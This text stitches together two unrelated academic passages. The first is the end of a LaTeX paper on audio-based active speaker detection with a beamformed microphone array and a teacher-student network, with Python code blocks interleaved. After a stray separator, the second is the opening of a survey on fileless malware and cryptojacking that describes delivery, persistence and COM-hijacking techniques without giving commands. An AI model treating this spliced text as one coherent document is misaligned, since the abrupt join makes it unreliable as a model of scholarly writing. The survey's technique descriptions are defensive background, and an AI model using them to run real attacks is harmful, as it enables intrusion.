The horizontal positions of the speakers' bounding-box centers yielded pseudo labels to supervise the training of the student audio network.
\subsection{Student Network}
The student network is trained to tackle active speaker detection as a simultaneous classification and regression problem: active/inactive classification, and regression of the speaker's position when speech activity is detected.
The network is trained using active and silent segments.
To localize moving vehicles, Gan \textit{et al.} \cite{Gan2019SelfSupervisedMV} fed their network directly with magnitude mel-spectrograms of the left and right stereo microphone signals, neglecting phase information and emphasizing level-difference cues.
With microphone arrays, we argue that fine time-difference cues are key for direction-of-arrival (DoA) estimation.
So, our solution spatially filters the array's audio by steering its directivity over \textit{N} horizontal so-called `look' directions.
The output \textit{N} audio signals give magnitude mel-spectrograms,
stacked as an \textit{N-}channel image input to the student network.
The advantages of this solution are twofold: time-difference cues are kept, and the beamformer's steered outputs help the network to converge.
\textbf{Beamformer:} Using the beamforming toolbox by Galindo \textit{et al.} \cite{galindo:2020:microphone}, a set of beamforming weights was computed to spatially filter the array signals over 15 look directions. We employed the super-directive beamformer (SDB) with white noise gain constraint as it preserves excellent quality of the target sound with good suppression of external noises \cite{galindo:2020:microphone}.
The designed frontal look directions are equally spaced along the horizon by 5° from one another in the range $\pm$30°, plus two additional directions at $\pm$45°. These positions were approximated by a Lebedev sampling grid, which has nearly uniform distribution over the sphere but is non-uniform in the azimuth-elevation representation seen in Fig.\,\ref{look_dir}.
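The toolbox of \cite{galindo:2020:microphone} computes super-directive weights with a white-noise-gain constraint; as a simplified stand-in, the steering idea can be illustrated with a far-field delay-and-sum beamformer (the array geometry, the 0°-broadside convention, and the sign of the steering delays below are illustrative assumptions, not the paper's design):

```python
import numpy as np

SPEED_OF_SOUND = 343.0  # m/s

def delay_and_sum(signals, mic_x, angle_deg, fs):
    """Steer a linear array toward `angle_deg` (0 deg = broadside): undo the
    per-microphone far-field delay in the frequency domain, then average.
    signals: (n_mics, n_samples); mic_x: horizontal mic positions in metres."""
    n_mics, n = signals.shape
    delays = np.asarray(mic_x) * np.sin(np.deg2rad(angle_deg)) / SPEED_OF_SOUND
    freqs = np.fft.rfftfreq(n, d=1.0 / fs)
    spec = np.fft.rfft(signals, axis=1)
    # phase shift so the target direction adds coherently across microphones
    spec *= np.exp(2j * np.pi * freqs[None, :] * delays[:, None])
    return np.fft.irfft(spec.sum(axis=0), n=n) / n_mics

def steer_bank(signals, mic_x, angles_deg, fs):
    """One beamformed output signal per look direction, stacked row-wise."""
    return np.stack([delay_and_sum(signals, mic_x, a, fs) for a in angles_deg])
```

With the 15 look directions above, `steer_bank` yields the 15 signals whose log-mel-spectrograms form the network input.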
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/Model_exp_06.pdf}}
\caption{Schematic representation of our `student' audio network.}
\label{audio_network}
\end{figure}
\textbf{Model:} The audio network takes as input a stack of 15 log-mel-spectrograms computed from the 15 beamformer output signals.
The network is depicted in Fig.\,\ref{audio_network}.
It has 7 convolutional layers that progressively decrease the time-frequency resolution of the spectrograms and increase the number of channels until a 1$\times$1$\times$512 feature vector is achieved.
Then, the feature vector passes through 4 fully connected layers.
The resulting vector is concatenated with an 11-dimensional one-hot vector encoding the camera view with which to perform the regression.
The reason for performing the concatenation at this stage of the network is to first reduce the length of the feature vector to approximate that of the one-hot vector.
Lastly, 2 fully-connected layers generate a 2D output vector representing the speaker's horizontal position and the confidence.
Each convolutional layer is followed by a ReLU layer to introduce non-linearity, dropout of 20\%, and batch normalization.
Similar to \cite{Krizhevsky:2012:AlexNet}, after the first, second, fifth and sixth layers, max pooling layers with stride 2 are applied to rapidly decrease the feature map dimensionality.
The output coordinates and confidence are normalized in the range [0, 1] by means of a Sigmoid function.
The per-frame detections are then temporally filtered using Gaussian smoothing to provide temporal coherence.
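The temporal filtering step can be sketched as follows (a plain-NumPy stand-in for a Gaussian smoother; the kernel width `sigma` is a hypothetical value, not one reported in the paper):

```python
import numpy as np

def gaussian_smooth(track, sigma=2.0):
    """Smooth a 1-D sequence of per-frame predictions with a normalized
    Gaussian kernel; edges are handled by reflection padding."""
    radius = max(1, int(3 * sigma))
    k = np.exp(-0.5 * (np.arange(-radius, radius + 1) / sigma) ** 2)
    k /= k.sum()
    padded = np.pad(np.asarray(track, dtype=float), radius, mode="reflect")
    return np.convolve(padded, k, mode="valid")
```

Applied to the per-frame horizontal predictions, this suppresses frame-to-frame jitter while preserving the sequence length.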
\textbf{Loss Function:} To train our model, we employ a sum-squared error-based loss function.
The loss is composed of two terms, a regression loss and a confidence loss:
\begin{equation}
Loss=\mathbbm{1}_{\mathrm{src}}(x-\hat{x})^2+(C-\hat{C})^2
\label{loss_function}
\end{equation}
where $\hat{x}$ and $x$ are respectively the predicted and ground truth positions of the speaker along the horizontal axis of the video frame, normalized in the range [0, 1], while $\hat{C}$ and $C$ are the predicted and ground truth confidences.
While the ground truth position of the speaker is simply provided by the teacher network, the confidence is computed as follows:
\begin{equation}
C =
\begin{cases}
1-|(x-\hat{x})| & \text{if source is active}\\
0 & \text{otherwise}\\
\end{cases}
\end{equation}
In doing so, the confidence is forced to be low in the absence of speech activity, and to estimate how close the coordinate prediction is to the source.
The farther the coordinate prediction is from the source, the lower the confidence is forced to be.
This means that $\hat{C}$ represents the confidence that a source is present in the model's predicted position.
The term $\mathbbm{1}_{\mathrm{src}}$ is 0 for silent frames and 1 for active ones, i.e., in the absence of speech the network is penalized by the confidence loss only.
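The loss and confidence target above can be written out as follows (a plain-NumPy sketch of Eq.\,\eqref{loss_function}; reducing over the batch by averaging is an assumption, as the paper does not state the reduction):

```python
import numpy as np

def confidence_target(x_gt, x_pred, active):
    """C = 1 - |x - x_hat| for active frames, 0 for silent frames."""
    return np.where(active, 1.0 - np.abs(x_gt - x_pred), 0.0)

def asd_loss(x_pred, c_pred, x_gt, active):
    """Regression term gated by speech activity, plus the confidence term."""
    c_gt = confidence_target(x_gt, x_pred, active)
    reg = np.where(active, (x_gt - x_pred) ** 2, 0.0)
    return float(np.mean(reg + (c_gt - c_pred) ** 2))
```

Note how silent frames contribute only through the confidence term, which pushes $\hat{C}$ toward zero in the absence of speech.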
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/lookDir_exp01.pdf}}
\caption{The 15 look directions employed. Blue circles represent the ideal steering angles; Red crosses are the Lebedev sampling grid approximations.}
\label{look_dir}
\end{figure}
\section{Experiments} \label{exp}
\subsection{Data Preparation}
To train the audio network we use short segments of audio (audio frames) temporally centered on the visual time frame of interest.
To increase the reliability of the positive face tracks detected by the teacher network, we manually screened the positive pseudo labels to remove potential false positives. In this way, we ensure that all the active frames used in training are correct. However, we cannot ensure that the negatives are actually true, i.e., whether they were classified as silent because of the actual absence of speech or simply because the speaker's face was not detected. Therefore, we used the AVA rigs to capture a silent audio sequence containing only the studio noise floor. The audio frames employed for training are sampled either from the teacher network's active detections or from this silent sequence, ensuring that the training samples are reliable. The silent sequence was captured to be long enough to approximately match the number of speech frames and therefore avoid bias between activity and inactivity.
In total we collated a training set with over 140k frames from 17 of the 20 dataset's sequences and silent segments.
The remaining 3 unseen sequences were used only at inference, for testing. To perform an impartial evaluation, we manually labeled the ground-truth bounding-box locations of the speaker's head in each of the 22 camera views, to yield 66 test sequences.
\subsection{Implementation Details}
As in \cite{vasudevan:2020:semanticobject}, gains were computed for each channel of the array to set their root mean square (RMS) magnitude to a desired value and achieve level calibration.
The audio frames used to train the network are 5 visual frames long, i.e., 166\,ms. Therefore, as was done for the training of the teacher network, to evaluate the \textit{i-th} frame we consider an audio chunk that starts at frame $i-2$ and finishes at frame $i+2$ (8000 audio samples). We extract the audio chunk of interest from each of the 15 signals achieved with the beamformer. A short-time Fourier transform with a Hann window of size 512 samples is applied at hop steps of 125 samples to generate a spectrogram for each look direction, discretizing the 8000-sample audio chunks into 64 temporal bins. The frequency resolution of the spectrograms is down-sampled over 64 mel-frequency bins and, finally, the logarithm operation is applied. Stacking together the 15 log-mel-spectrograms, the result is a 64$\times$64 image with 15 channels. To leverage and amplify the differences between silent and active frames at each frequency band, we normalize the network's inputs following a frequency-wise normalization criterion. First, the mean of the pixels' values is computed for each frequency bin over the entire training set. Then, each pixel value is normalized by subtracting its frequency bin's mean and dividing by the global standard deviation. We found that this normalization approach enhances the performance in comparison to the traditional approach based on the global mean and global standard deviation.
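The feature-extraction steps above can be sketched in plain NumPy (framing without librosa-style centre padding, so a 8000-sample chunk yields 60 rather than 64 frames; the mel-filterbank construction is a standard one, assumed rather than taken from the paper):

```python
import numpy as np

def hz_to_mel(f):
    return 2595.0 * np.log10(1.0 + f / 700.0)

def mel_to_hz(m):
    return 700.0 * (10.0 ** (m / 2595.0) - 1.0)

def mel_filterbank(n_mels, n_fft, fs):
    """Triangular filters mapping n_fft//2+1 linear bins to n_mels bands."""
    pts = mel_to_hz(np.linspace(0.0, hz_to_mel(fs / 2.0), n_mels + 2))
    bins = np.floor((n_fft + 1) * pts / fs).astype(int)
    fb = np.zeros((n_mels, n_fft // 2 + 1))
    for i in range(n_mels):
        lo, ce, hi = bins[i], bins[i + 1], bins[i + 2]
        if ce > lo:
            fb[i, lo:ce] = (np.arange(lo, ce) - lo) / (ce - lo)
        if hi > ce:
            fb[i, ce:hi] = (hi - np.arange(ce, hi)) / (hi - ce)
    return fb

def log_mel(x, fs=48000, n_fft=512, hop=125, n_mels=64):
    """Log-mel-spectrogram of one beamformer output (Hann window, as in the
    paper; no centre padding, hence slightly fewer temporal bins)."""
    win = np.hanning(n_fft)
    n_frames = 1 + (len(x) - n_fft) // hop
    frames = np.stack([x[i * hop:i * hop + n_fft] * win
                       for i in range(n_frames)])
    mag = np.abs(np.fft.rfft(frames, axis=1))        # (n_frames, 257)
    mel = mag @ mel_filterbank(n_mels, n_fft, fs).T  # (n_frames, 64)
    return np.log(mel + 1e-8).T                      # (64, n_frames)

def freq_normalize(stack, bin_means, global_std):
    """Frequency-wise normalization: subtract each mel bin's training-set
    mean, then divide by the global standard deviation."""
    return (stack - bin_means[None, :, None]) / global_std
```

Stacking `log_mel` over the 15 beamformer outputs produces the 15-channel image, and `freq_normalize` applies the frequency-wise criterion (here using statistics of one batch for illustration; the paper computes the bin means over the whole training set).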
We trained our audio network for 25 epochs using batches of 64 images, Adam optimizer, and a learning rate of \num{2e-4}.
\subsection{Evaluation Metrics}
A prediction is considered to be positive, i.e., the network predicts the presence of speech, when the predicted confidence is above a threshold, and a positive detection is considered to be true when the localization error is within a predefined tolerance.
We compute the precision and recall rates by varying the confidence threshold from 0\% to 100\%. Since, at inference, the network's confidence tends to be either very high or very low, we build the precision-recall curves by sampling the thresholds from a Sigmoid-spaced distribution. This provides more data points for high and low confidence values. The common object detection metric average precision (AP) was then computed. The AP is determined following the approach indicated by the Pascal VOC Challenge \cite{Everingham:2015:pacalVOC}, which consists of: 1) computing a monotonically decreasing version of the precision-recall curve by setting the precision for recall \textit{r} equal to the maximum precision obtained for any recall \textit{r'$\geq$r}, and 2) computing the AP as the numerical integration of the curve, i.e., the area under the curve (AUC).
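The AP computation described above can be sketched as follows (the Sigmoid spacing of the thresholds is illustrative: the paper does not specify the exact number or range of thresholds; `recall` is assumed sorted in increasing order):

```python
import numpy as np

def sigmoid_spaced_thresholds(n=50, span=6.0):
    """Thresholds denser near 0 and 1, matching a confidence distribution
    that is mostly very high or very low."""
    return 1.0 / (1.0 + np.exp(-np.linspace(-span, span, n)))

def voc_ap(recall, precision):
    """Pascal-VOC AP: take the monotonically decreasing precision envelope,
    then integrate the precision-recall curve (area under the curve)."""
    r = np.concatenate(([0.0], np.asarray(recall, float), [1.0]))
    p = np.concatenate(([0.0], np.asarray(precision, float), [0.0]))
    for i in range(len(p) - 2, -1, -1):
        p[i] = max(p[i], p[i + 1])           # precision envelope
    idx = np.where(r[1:] != r[:-1])[0]       # points where recall changes
    return float(np.sum((r[idx + 1] - r[idx]) * p[idx + 1]))
```

Sweeping the thresholds from `sigmoid_spaced_thresholds` over the predictions yields the (recall, precision) pairs that `voc_ap` integrates.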
According to human auditory spatial perception \cite{Strybel:2000:MinimumAA}, the minimum audible angle (MAA) is 2°. Therefore, we set a tolerance for spatial misalignment between the prediction and the GT speaker's position of $\pm$2° along the azimuth, which corresponds to $\pm$89 pixels if projected onto the image plane\footnote{All conversions from pixels to degrees and vice-versa are performed with pre-computed camera-calibration data.}.
However, in many practical audio-visual applications, the human brain tends to tolerate greater misalignments as it integrates audio and visual signals as a unified object (ventriloquism effect \cite{Stenzel:2018:PTC,Berghi:2020:IEEEVR}).
For this reason, the AP is also reported at $\pm$5° tolerance ($\pm$222 pixels) to provide greater flexibility.
We also compute the F1 score to find the optimal compromise between precision and recall. Additionally, the average distance (aD) between the active detections and the GT locations is reported in both pixel and angle units.
Finally, regardless of the regression accuracy, we measure the amount of correct classifications between active and silent frames achieved by setting the confidence at 0.5.
\begin{table}[tb]
\caption{Method results in average distance (aD), average precision (AP) and F1 score at 89 ($\pm$2°) and 222 ($\pm$5°) pixel tolerances.}
\begin{center}
\begin{tabular}{c|c|c|c|c|c}
\hline
\textbf{Method}&\textbf{aD}&\textbf{AP@2°}&\textbf{F1@2°}&\textbf{AP@5°}&\textbf{F1@5°} \\
\hline
Teacher &\textbf{10p (0.2°)} & 61.1\% & 0.68 & 61.2\% & 0.68 \\
Mono & 318p (7.2°) & 5.1\% & 0.19 & 23.0\% & 0.44\\
Stereo & 196p (4.4°) & 19.3\% & 0.39 & 52.6\% & 0.67\\
w/out BF & 145p (3.3°) & 36.2\% & 0.54 & 71.5\% & 0.79\\
3 look dir & 86p (1.9°) & 53.9\% & 0.69 & 82.7\% & 0.88\\
7 look dir & 77p (1.7°) & 59.0\% & 0.72 & 86.6\% & 0.90\\
Ours & 76p (1.7°) & 66.6\% & 0.79 & 86.2\% & 0.91\\
Ours + tc & 68p (1.5°) & \textbf{70.5\%} & \textbf{0.81} & \textbf{87.1\%} & \textbf{0.92}\\ \hline
\end{tabular}\vspace{-3ex}
\label{tabBaselines}
\end{center}
\end{table}
\subsection{Baseline Methods} \label{baseln}
We evaluate our approach performance against a variety of different baselines to motivate its design choices.
\textbf{Teacher network:} We process the test set sequences with the teacher network. Note that while our approach estimates only the horizontal position of the speaker, the teacher provides the bounding box coordinates of the speaker's face. Therefore, for a fair comparison, we consider only the x coordinate of the center of the predicted bounding box.
\textbf{W/out BF:} To prove the benefit introduced by the use of the beamformer, we train a model to perform the same task directly using the log-mel-spectrograms of the 16 microphone signals. The model used is identical, but the input images have 16 channels rather than 15.
\textbf{Stereo:} Similarly to the `W/out BF' baseline, we do not apply spatial filtering to the audio signal. In this case, we use the log-mel-spectrograms achieved from just 2 of the microphones. We use the microphones spaced at $\pm$88.3\,mm from the center of the array, which is consistent with the ORTF stereo microphone capturing technique. Here, the inputs of the network are 2-channel images.
\textbf{Mono:} We only use the log-mel-spectrogram of the central microphone signal. This allows us to observe what the model can learn from monaural sound with no additional spatial cues.
\textbf{3 \& 7 look dir:} The audio network is trained with fewer look directions to observe the effects of a coarser input spatial resolution. The `3 look dir' baseline employs only the look directions at 0° and $\pm$20°, while `7 look dir' uses the directions at 0°, $\pm$15°, $\pm$30° and $\pm$45°.
\textbf{Ours + tc:} We smooth the consecutive per-frame detections by means of a Gaussian temporal filter that provides temporal coherence.
\section{Results} \label{res}
\subsection{Method Comparisons}
Experimental results show that our approach considerably outperforms the other baselines. Fig.~\ref{precision_recall} reports the precision-recall curves achieved with the different baselines, while the metric results are reported in Tab.~\ref{tabBaselines}.
\textbf{Ours vs. Teacher network:} As appreciable from Fig.~\ref{precision_recall}, our approach produces a remarkable improvement in recall rate, meaning that it detects the speakers more easily compared to the teacher network. The teacher network's poorer recall rate is caused by its inability to detect speakers when their face is not visible to the face detector, e.g., when the actors are not facing the camera. This problem does not affect our audio network. Conversely, the spatial resolution achievable with the visual modality produces a higher maximal precision, although overall our approach has greater AP.
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/azimuth_over_time_exp02.pdf}}
\caption{Example of detections over time from one camera view on a test sequence. Pixel coordinates provided also in angles for reference.}
\label{azimuthOverTimeMonologue}
\end{figure}
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/precision_recall_89_exp02.pdf}}
\caption{Method comparison of precision versus recall at 89-pixel tolerance. Dots mark the highest F1 scores.}
\label{precision_recall}
\end{figure}
\textbf{W/ vs. W/out Beamformer:} The employment of the beamformer introduces an important improvement over the direct use of the audio channels, with an increment in AP of 30.4 percentage points at 89p tolerance and 14.7 percentage points at 222p. Benefits in both the precision and recall rates are noticeable, and the average distance is decreased by 69p (1.6°). Even with fewer look directions the benefit is remarkable, meaning that the beamformer provides the overall system with a higher localization accuracy. The advantage of additional look directions is less appreciable with a larger tolerance (222p), where the AP resulted slightly higher with 7 look directions than with 15.
\textbf{16 Channels vs. Stereo vs. Mono:} The availability of a higher number of microphones improves the network's spatial resolution in that it provides additional spatial cues. The employment of 16 microphones rather than only 2 decreases the aD error from 196p (4.4°) to 145p (3.3°) and, as a result, the precision and recall rates are higher. Nevertheless, the Stereo configuration still proved to deliver a decent degree of spatial accuracy, which might be useful in situations with limited availability of microphones. As expected, the Mono baseline produced a poor AP, although its aD error might appear to be relatively low. This is caused by the network trying to minimize the regression error by predicting the speaker's position to always be towards the center of the visual frames.
\subsection{Spatial Resolution}
The results show that the spatial resolution increases when more look directions are employed; however, the improvement is not remarkable: on average, a 10p improvement from 3 to 15 look directions, and only 1p from 7 to 15 look directions.
The spatial resolution can be further refined by temporally filtering the per-frame detections to provide temporal coherence, as defined in \ref{baseln}. After the filtering, the average distance error is only 68p (1.5°).
Also, it would be hard to keep the error below this value considering that a certain degree of approximation is already introduced by the spatial offset between the mouth and center of the bounding box itself. As expected, the spatial resolution achievable with the teacher network is very high thanks to the visual modality.
\subsection{Speech Activity Detection}
In correctly classifying the presence of speech, all the baselines perform similarly well: the `w/out BF' baseline classified 94.7\% of the frames correctly, and both our approach and Stereo 95.7\%.
In fact, for this task the use of beamformers and multiple audio channels proves superfluous and potentially redundant. Indeed, the highest classification performance was achieved by the Mono baseline with 96.6\% correctness. By observing the false-positive detections, it is possible to notice that they are mainly caused by external noises such as footsteps and the actors' breathing prior to the speech segments, meaning that the network learned to distinguish between the presence of general activity and silence, while the manual annotations only reported the actual speech segments. This behavior can be explained by the fact that the silent frames used in training came from a completely silent capture of the room noise floor. If a more selective model is needed, this can be accomplished by including unwanted non-speech sounds in the silent track.
\section{Conclusion} \label{concl}
In this work, we proposed a self-supervised learning approach to solve the active speaker detection and localization problem using a microphone array. To generate the pseudo labels used to train our model from newly collected data, we adopted a pre-trained audio-visual teacher network. We proposed a new strategy for combining spatial filtering with deep learning techniques and evaluated our system against several different baselines, with a favorable outcome. Future experiments will explore different beamformers, look directions, and network architectures, as well as benchmark our approach with other state-of-the-art solutions and datasets.
\section*{Acknowledgment}
Thanks to Marco Volino, Mohd Azri Mohd Izhar, Hansung Kim, Charles Malleson and actors for audio-visual recordings.
\bibliographystyle{IEEEtran}
|
With highly skilled attackers \cite{smith2020moment} and zero-day vulnerabilities, the number and complexity of sophisticated cyberattacks are increasing \cite{burt2020}. Ransomware \cite{lee2021study} and unauthorized cryptomining \cite{wei2021deephunter} are the most common threats in the wild \cite{olaimat2021ransomware}. Recently, ransomware and cryptojacking incidents have increasingly been observed in connection with an emerging threat: ``fileless malware,'' which is ten times more successful than other file-based attacks \cite{mansfield2017fileless}.
The key strength of this technique is that it runs malicious scripts in memory (RAM), injecting adversarial code into legitimate processes in order to bypass sophisticated but traditional signature-based and behavior-based anti-malware detection systems \cite{bulazel2017survey}. The scripts leave no trace on the disk \cite{mansfield2017fileless} as an anti-forensics technique \cite{saad2019jsless} while providing full control to remote Command and Control (C2) servers \cite{smelcer2017rise}. Furthermore, even if the original malicious scripts are identified and removed, the malware remains operational on victim endpoints.
A remarkable feature of fileless threats is their stealth: they use legitimate built-in tools that cannot be blocked, such as PowerShell, WMI (Windows Management Instrumentation) subscriptions, and Microsoft Office Macros \cite{margosis2011windows}. This is also called a living-off-the-land attack because attackers do not need to install any additional tools during the attack. Moreover, the scarcity of forensic evidence and the exploitation of well-known tools like PsExec.exe or Adfind.exe \cite{barr2021survivalism} make detection harder and investigations challenging \cite{baldin2019best}.
In 2017, 77\% of detected attacks came from the more sophisticated fileless attack techniques \cite{kumar2020emerging,Ponemon2017}. In 2019, Trend Micro reported that they blocked more than 1.4 million fileless events \cite{trendmicro1}. In 2020, fileless malware detections increased nearly 900\% because most threat actors had discovered its effectiveness compared with traditional methods \cite{WatchGuard2020,panker2021leveraging}.
Notably, open-source attack frameworks, such as PowerShell Empire and PowerSploit, play a significant role \cite{piet2018depth} in complex fileless malware attacks \cite{nelson2020open}. These frameworks are distributed as open-source tools to create and simulate attack phases for nefarious purposes as well as for penetration testing. The open-source tools also provide capabilities for elevating privileges or spreading laterally across victim networks. Some of these penetration test (Red Team) tools are Mimikatz, Cobalt Strike, and Metasploit \cite{panchal2021review}. In particular, Cobalt Strike and Metasploit were the fileless malware threat sources for a quarter of all malware servers in 2020 \cite{cimpanu2021cobalt, vandetecting}. A 161 percent increase in the usage of the Cobalt Strike framework was observed in 2020 \cite{threatpost2021}. In the first half of 2021, most attacks were observed with the Cobalt Strike attack tool \cite{malwarebytes2021}.
Using fileless malware, threat actors, specifically APT groups, try to steal data, disrupt operations, destroy infrastructure, or abuse computing resources as seen in cryptojacking incidents \cite{varlioglu2020cryptojacking}. Unlike in most traditional methods, threat actors move slowly in fileless attacks, specifically during lateral movement on networks, to avoid detection \cite{mwiki2019analysis}. Therefore, attacks can take days, weeks, or sometimes months, causing a persistent data breach or resource abuse as experienced in cryptojacking.
Cryptojacking is the unauthorized use of a computing device to mine cryptocurrency \cite{Hong2018}, \cite{Eskandari2018},~\cite{varlioglu2020cryptojacking}. In a cryptojacking attack, a victim may suffer from degraded computer performance, hardware deterioration (CPU, GPU, and battery), and high electricity bills.
\begin{figure*}
\centering
\includegraphics[width=0.7\textwidth]{keyword_google.png}
\caption{The popularity rate of fileless malware and cryptojacking words on Google.}
\label{fig1Label}
\end{figure*}
There are three types of cryptojacking attacks.
\begin{enumerate}
\item \textbf{In-browser Cryptojacking}: runs with cryptojacking websites that contain hidden mining scripts \cite{tekiner2021sok}.
\item \textbf{In-host Cryptojacking}: runs on operating systems and disks (ROM) as malicious programs \cite{tekiner2021sok}.
\item \textbf{In-memory only Cryptojacking}: that runs on memory (RAM) only with malicious scripts \cite{tremdmicromonero2019}.
\end{enumerate}
Although in-browser cryptojacking attacks declined after the Coinhive (in-browser crypto-mining service) shutdown in March 2019, in-memory cryptojacking is one of the most prevalent threats in the wild \cite{olaimat2021ransomware}. 25\% more cryptocurrency mining malware was observed in 2020 than in 2019 \cite{CNBC2021}. With the rise of fileless malware and cryptojacking incidents, cybercriminals have now merged these attacks into a dangerous combo: fileless cryptojacking malware \cite{Constantin2019}. Even though fileless malware and cryptojacking attacks started independently and both attack types gained popularity in 2017, as shown in Fig.~\ref{fig1Label}, cryptojacking incidents were observed together with fileless malware attacks after 2019 \cite{Constantin2019}.
In this paper, we attempt to provide an understanding of emerging fileless cryptojacking. The second goal is to fill a gap in the literature, as there is no sufficient research on this new problem. Finally, we present a novel threat hunting-oriented DFIR approach with best practices derived from academic research and field experience. To the best of our knowledge, this paper is one of the first comprehensive research attempts on ``fileless cryptojacking.''
\section{Fileless Malware Workflow}
Malware analysis relies on the analysis of executable binaries, but in fileless malware there is no actual executable stored on a disk to inspect \cite{bulazel2017survey}. The malware stays and operates in Random Access Memory (RAM) and removes its footprints to increase the difficulty of removal \cite{mansfield2017fileless}. It is also called non-malware, an Advanced Volatile Threat (AVT) \cite{afianian2019malware}, or a Living-off-the-Land (LotL) attack, because threat actors use legitimate tools, processes, benign software utilities, and libraries during an attack \cite{saad2019jsless}. These are built-in, native, and highly trusted Windows applications such as Windows Management Instrumentation (WMI) subscriptions, PowerShell, and Microsoft Office Macros \cite{margosis2011windows}. Thus, the threat is stealthy, and it is almost impossible to block these legitimate built-in tools. In other words, the operating system attacks itself.
However, fileless malware is a broad term, and some attacks can combine file-based techniques with fileless malware. Also, some phases of the attack chain can be fileless while others store files on disk \cite{Microsoft82021}. For example, in one ransomware incident, the attack was completed by writing files to the disk; however, the delivery, execution, and propagation phases were still fileless \cite{saad2019jsless}.
Based on this concept, fileless malware threats can be classified into two types:
\begin{itemize}
\item \textbf{Type I}: \textbf{Fully Fileless Malware}: It performs no file activity on disk; all activities are observed in memory. Threat actors can send malicious network packets to install backdoors that reside only in kernel memory \cite{Microsoft82021}.
\item \textbf{Type II}: \textbf{Fileless Malware with Indirect File Activity}: It does not directly write files to disk, but threat actors can install a PowerShell command within the WMI repository by configuring a WMI filter for persistence. Even though the malicious WMI object theoretically exists on disk, it does not touch the file system. Therefore, it is considered a fileless attack because, according to Microsoft \cite{Microsoft82021}, ``\textit{the WMI object is a multi-purpose data container that cannot be detected and removed}''.
\end{itemize}
Below, the workflow of fileless threat is explained.
\subsection{Delivery}
In a fileless threat, if there is no network-based vulnerability exploitation, the initial entry vector may be a file; however, the payload is always fileless. Thus, these kinds of attacks are still considered fileless \cite{Microsoft82021}.
Specifically, spear phishing is commonly used to distribute fileless malware \cite{baldin2019best} such as Trickbot \cite{rendell2019understanding}. The email attachments load scripts directly into memory \cite{kumar2020emerging} without even touching the local file systems \cite{celik2019behavioral}. ``Office Macros'' are convenient for deceiving users \cite{afreen2020analysis}.
After 2020, attackers started to use the Cobalt Strike framework to establish remote control with complete command execution from inside Microsoft Office Word and Excel files that arrive via phishing emails \cite{Darktrace2021}. Malicious macros can create scheduled tasks that download files camouflaged as ``.jpg'', ``.png'', or ``.dll'' files from the attackers' command and control servers (C2s), as seen in Fig.~\ref{fig2} \cite{Cyberreason2017}. The content of the camouflaged files can actually be obfuscated PowerShell payload scripts.
\begin{figure}
\centering
\includegraphics[width=\linewidth]{schtaskfromword.PNG}
\caption{Sample malicious macro to create a scheduled task from a word file in a phishing email.}
\label{fig2}
\end{figure}
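One defensive check against such camouflaged downloads is comparing a file's claimed extension with its magic bytes. Below is a minimal sketch of that check; the extension table and example filenames are illustrative assumptions, not artifacts from any specific campaign.

```python
# Sketch: flag downloads whose claimed extension does not match the file's
# magic bytes (e.g., a ".png" that actually contains a PowerShell script).
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",  # PNG signature
    ".jpg": b"\xff\xd8\xff",       # JPEG signature
    ".dll": b"MZ",                 # PE/DOS header
}

def extension_mismatch(filename: str, content: bytes) -> bool:
    """Return True when a known extension's magic bytes are absent."""
    for ext, magic in MAGIC.items():
        if filename.lower().endswith(ext):
            return not content.startswith(magic)
    return False  # unknown extension: no opinion
```

In practice such a check would run on proxy or sandbox captures; a mismatch alone is only an indicator, not proof of maliciousness.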
On the other hand, zero-day vulnerabilities such as Log4j or SolarWinds Serv-U \cite{CSW2021} are exploited for remote code execution in fileless attacks. Even though patches have been released, some organizations may miss the updates, or the updates may not work at first. Successful exploitation gives attackers the ability to gain privileges and to view and change data \cite{baldin2019best}. Recent exploitations have been observed with the Cobalt Strike framework, creating effective backdoors and scheduled tasks \cite{Microsoft2021, CSW2021}.
Unhardened attack surfaces such as public-facing RDP, FTP, SSH, and MS-SQL ports can also be exposed to attacks that can lead to unauthorized access to deploy fileless malware \cite{panchal2021review}.
Last, a malicious website or a compromised legitimate website can contain some form of malicious code such as JavaScript \cite{saad2019jsless}, iFrames, and cross-site scripting. Since browsers run scripts automatically, the attack does not require any user interaction beyond visiting the site. This mode of infection makes detection very difficult. A malicious script from such a website can run an encoded PowerShell script to conduct a fileless malware attack by loading executables and libraries into a legitimate Windows process \cite{TrendMicro2017-1}. For instance, Saad et al. \cite{saad2019jsless} demonstrated how to develop fileless malware (JSless) for web applications using JavaScript features with HTML5; five well-known anti-malware systems could not detect it \cite{saad2019jsless}.
\subsection{Deployment}
In this phase, the deployment vector may be a file such as an executable, DLL, LNK file, or scheduled task \cite{Microsoft82021}; however, the payload is always fileless in memory. Base64-encoded PowerShell commands or VBScript (with Wscript) \cite{saad2019jsless} play a significant role in injecting into legitimate processes on Windows or into autostart services inside autorun registry keys such as WMI event subscriptions \cite{Microsoft82021}. A legitimate process can connect the endpoint to a C2 server through outgoing traffic \cite{afianian2019malware}. Attackers can also exploit sysadmin tools to deploy fileless malware, such as PsExec, MSHTA, BITSAdmin, CertUtil, and Msiexec. This can also be a second step after a script-based deployment. Fileless trojans can distribute and reinject themselves into other processes \cite{sihwail2021effective}.
\subsection{Persistent Mechanism}
Even if malicious scripts are identified and removed, or the endpoint is rebooted, a persistent mechanism can keep the malware operational. This gives attackers time to escalate privileges and move laterally on networks. Specifically, PowerShell, WMI subscriptions, scheduled tasks, and the registry hive are used to create a persistent mechanism \cite{boranaassistive}, \cite{afianian2019malware}. When fileless malware is deployed, a legitimate Windows process can write executable (mostly Base64-encoded) code into the registry \cite{kumar2020emerging} to run an encoded command that executes the payload during reboot. Common persistence frameworks are Armitage, Empire, and Aggressor Scripts. These scripts help attackers exploit the Windows Task Scheduler \cite{afreen2020analysis}. For example, a registry key including a PowerShell command may control a malicious scheduled task \cite{boranaassistive}.
In some attacks, a registry key is used to redirect a process to another key associated with the first one through the ``TreatAs'' feature in order to execute the payload. ``TreatAs'' is a registry key that allows one CLSID (Class ID) to be spoofed by another CLSID; in this way, a COM object can be redirected to another COM object. This technique is called COM (Microsoft Component Object Model) hijacking. COM is a Windows system that provides interaction between software components through the operating system. COM hijacking is used for persistence and evasion by inserting malicious executable code in place of legitimate software through the Windows Registry under normal system operation \cite{Mitre2021COM}.
